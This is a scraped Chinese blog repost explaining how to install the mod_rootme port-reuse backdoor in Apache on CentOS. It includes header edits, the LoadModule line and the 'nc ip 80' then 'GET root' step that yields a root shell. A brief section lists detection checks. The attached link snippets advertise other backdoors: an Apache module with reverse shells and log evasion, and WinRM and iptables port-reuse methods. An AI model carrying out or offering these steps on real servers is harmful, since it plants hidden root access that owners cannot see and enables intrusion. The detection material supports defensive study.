linux 端口复用后门,Apache端口复用后门 | CN-SEC 中文网

最新推荐文章于 2024-08-28 08:00:38 发布
最新推荐文章于 2024-08-28 08:00:38 发布
阅读量554 收藏
点赞数
文章标签: linux 端口复用后门

摘要

Apache2.5

利用方式

先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错

测试环境

CentOSx64 6.5

Apache2.5

利用方式

先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错

将: #define MODULE_MAGIC_COOKIE 0x41503230UL 改为: #define MODULE_MAGIC_COOKIE 0x41503232UL 将: #define MODULE_MAGIC_NUMBER_MAJOR 20020903 改为: #define MODULE_MAGIC_NUMBER_MAJOR 20051115

然后保存。输入make linux进行编译

29606e92e7e30cb853c2cf042d6a356a.png

然后修改/etc/httpd/conf/httpd.conf

添加 LoadModule rootme22_module modules/mod_rootme22.so 加载这个模块。

然后启动apache

然后使用就可以连接80端口 nc ip 80 然后输入GET root

1101742e5c5b2a088e658a4642d83341.png

成功获取shell

0x02 检测方式

1.通过ps -ef grep httpd 可以看到有root用户使用的httpd子进程

1095dbcb7601b26551e332209cc9a8f2.png

然后可以进一步去查看apache配置文件

2.通过

ps -ef | grep http | head -n 1 | awk '{system("ls -l /proc/"$2"/fd")}' | grep pipe | wc -l

正常情况下是64,加载了mod_rootme后是66

3.在web目录下写个phpinfo看是否加载了mod_rootme模块

作者:Tomato

wlj509
关注
关于苛刻网络做Linux端口复用的那件事
include_voidmain的博客
04-14 1128
0x01 前言 端口复用是指不同的应用程序使用相同端口进行通讯。内网渗透中,搭建隧道时,服务器仅允许指定的端口对外开放。利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。 0x02 Linux端口复用 一、iptables实现端口复用 iptables只是Linux防火墙的管理工具而已。真正实现防火墙功能的是netfilter, 它是Linux内核中实现包过滤的内部结构。 二、数据通过防火墙流程 1、 链 链是一些按顺序排列的规则的列表。 PREROUTING链——对数据包作路由选择
WINRM实现端口复用后门
qq_16709189的博客
08-08 1681
使用环境 渗透测试过程中有些网络环境禁止外链以及有防火墙的情况下可以重用计算机上面开放的某些端口这些端口往往不受到防火墙的阻挡,从而可以实现木马的远程操控 1.winrm 实现端口复用 win8环境下需要开启winrm配置 ,使用命令winrm quickconfig -q 2.把默认的5985端口修改成80端口 winrm set w...
apache2_BackdoorMod:Apache2的后门模块
04-15
Apache2的mod_backdoor mod_backdoor是使用Apache2模块的隐形后门。 主要思想是在主Apache2进程加载其配置后对其进行fork()处理。 由于它是在root用户将进程转移到www-data之前创建的,因此您可以root身份执行命令。 由于Apache2仅在(重新)启动时才加载其配置,因此面临的挑战是永不让这个分叉的root apache2进程死亡,让我们以root用户身份与受感染的系统进行交互。 特征 绑定TTY外壳 反向Shell(TTY,本机,PHP,Perl,Python,Ruby) 高度的稳定性和可靠性,每个外壳产生一个新的分叉的独立根进程,该进程附加到PID 1,并从apache2 cgroup中删除 Socks5代理 通过Cookie标头进行密码保护 ping模块以了解其是否仍处于活动状态 绕过日志记录机制。 Apache2不会记录对后
linux 端口复用后门,一条命令实现端口复用后门
weixin_39629093的博客
05-11 557
说到端口复用,大部分人第一反应肯定是想到内核驱动,需要对网络接口进行一些高大上的操作才能实现。但只要合理利用操作系统提供的功能,就能以简单的方式实现这一目标,本文将公布一种基于内置系统服务的端口复用后门方法。对于不想看原理,只关心如何使用的读者可以直接跳到“0x02. 后门配置”。0x01. 基本原理介绍该后门的基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自...
Apache2 Backdoor 模块使用教程
最新发布
gitblog_01071的博客
08-28 285
Apache2 Backdoor 模块使用教程 apache2_BackdoorModA backdoor module for Apache2项目地址:https://gitcode.com/gh_mirrors/ap/apache2_BackdoorMod 项目介绍 Apache2 Backdoor 模块是一个用于 Apache HTTP 服务器的隐形后门。该项目的主要思路是在 Apache...
linux端口复用隐藏后门
m0_46799123的博客
09-14 555
端口复用实验
Linux端口复用
cnbird's blog
08-30 6532
我们首先需要知道什么是端口复用,它就是在系统已经开放的端口上进行通讯,并且不影响系统的正常工作和服务的正常运行。 端口复用的功能是在端口复用的基础上进行连接、获得SHELL、上下载文件、浏览目录、添加删除用户、改变用户口令等。端口复用只对输入的信息进行字符串匹配,不对网络数据进行任何拦截、复制类操作,所以网络数据的传输性能丝毫不受影响。建立连接后服务端程序占用极少系统资源,被控端不会在系统性能方
linux 端口复用后门,那些年系列 0x02---基于端口复用apache后门的调试与使用
weixin_42122986的博客
05-11 479
【*】作者:小飞【*】QQ 5119187此为系列教材,分为三个部分0x01---后门隐藏技术的攻与防0x02---基于端口复用apache模块后门 mod_rootme的调试与使用0x03---LKM rootkit的编译与使用-----------------------------------------------0x02---基于端口复用apache模块后门 mod_rootme的调...
Python实现端口复用实例代码
12-24
本文介绍Python实现端口复用实例如下所示: #coding=utf-8 import socket import sys import select import threading\nhost='192.168.99.100' port=80 class Thread(threading.Thread): def __init__(self,buf,...
Linux进阶】端口复用与SO_REUSEADDR/SO_REUSEPORT
W1024201的博客
03-20 1201
端口复用真正的用处主要在于服务器编程:当服务器需要重启时,经常会碰到端口尚未完全关闭的情况,这时如果不设置端口复用,则无法完成绑定,因为端口还处于被别的套接口绑定的状态之中。
WinrmCmd-master_Winrm_winrm远程复制_winrmcmd_GoWinRM_端口复用_
10-02
Winrm远程命令/端口复用/WinrmCmd/密码爆破 Golang、powershell、python实现WinrmShellwiki: http://k8gege.org/Ladon/WinrmScan.html
linux系统下端口复用技术
09-23
linux系统下端口复用技术,介绍Linux系统端口复用的教程
linux系统下端口复用技术的
04-23
linux系统下端口复用技术的<br>一些理解和认识
mod-rootme:Ye olde root shell for ye olde httpd
06-14
mod_rootme mod_rootme 是一个 Apache 后门模块,可以生成一个 root shell。 我在教授软件安全实验室时使用了这个模块。 该模块已经存在一段时间了,但是托管最新版本似乎已经从网络上消失了。 'rkhunter' 和 'unhide' 等恶意软件检测程序可以轻松检测到 mod_rootme 的存在,因此再次传播此代码应该不会太有害。 这个存储库是从我碰巧从我的旧类文件 (mod_rootme-0.4.tar.gz) 中找到的旧存档导入的,更新后构建在 Debian GNU/Linux 8.0 上。 有关原始文档,请参阅 README.old.txt。 尝试这个东西 要在 Debian/Ubuntu 系统上构建和测试,您需要 apache2 和 apache2-dev。 运行 'make' 和 'sudo make install' 来构建模块,并在
Linux网络编程——端口复用(多个套接字绑定同一个端口
热门推荐
秋叶原 && Mike || 麦克
03-04 5万+
在《绑定( bind )端口需要注意的问题》提到:一个网络应用程序只能绑定一个端口( 一个套接字只能绑定一个端口 )。 实际上,默认的情况下,如果一个网络应用程序的一个套接字 绑定了一个端口( 占用了 8000 ),这时候,别的套接字就无法使用这个端口( 8000 )。 那如何让sockfd_one, sockfd_two两个套接字都能成功绑定8000端口呢?这时候就需要要到端口复用了。端口复用允许在一个应用程序可以把 n 个套接字绑在一个端口上而不出错。
socket 网络编程——端口复用技术(setsockopt())(linux下多个进程监听同一个端口
JMW1407的博客
07-14 2万+
端口复用技术端口复用1、背景2、定义3、setsockopt4、实验案例参考 端口复用 1、背景 操作系统如何区分一个socket的呢? socket = 《A进程的IP地址:端口号,B进程的IP地址:端口号》 也就是说,只要五元素不完全一致,操作系统就能区分socket。 场景分析: 在A机上进行客户端网络编程,假如它所使用的本地端口号是1234,如果没有开启端口复用的话,它用本地端口1234去连接B机再用本地端口连接C机时就不可以,若开启端口复用的话在用本地端口1234访问B机的情况下还可以用本地端口
Linux 端口复用详解(附有案例代码)
热爱数据库的小胖
07-21 3024
这个时间段内,主动断开方在等待,并没有及时释放,所以其他设备无法及时的与主动段开放进行再次连接;2、端口复用API。
利用iptable实现ssh端口复用后门
qq_68163788的博客
11-20 1502
Linux系统中,可以使用iptables来实现SSH端口复用后门。SSH端口复用后门是一种隐藏在SSH服务中的后门,可以通过修改iptables规则来实现。 首先,需要确保iptables已经安装在系统中。上面的命令中,是指定的用于后门端口号,是原本的SSH服务端口号。 接下来,需要修改SSH配置文件,将监听端口改为新的端口号。打开SSH配置文件(通常是/etc/ssh/sshd_config),找到Port项,并将原本的SSH端口号改为新的端口号。
linux下解决80端口被占用
qq_33421902的博客
05-08 2万+
重装nginx服务,在启动的时候报80端口被占用了首先我们查一下占用80端口的有哪些服务,netstat -lnp|grep 80 查看80端口被那些服务占用。我们会发现其实就是nginx自己占用了80端口,重装的时候只是删除了nginx文件,并没有关闭nginx,所以出现这种情况,服务名称前面是他的pid号。我只要把它进程给结束掉就可以了。命令:kill -9 25158在去查看一下80被占用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值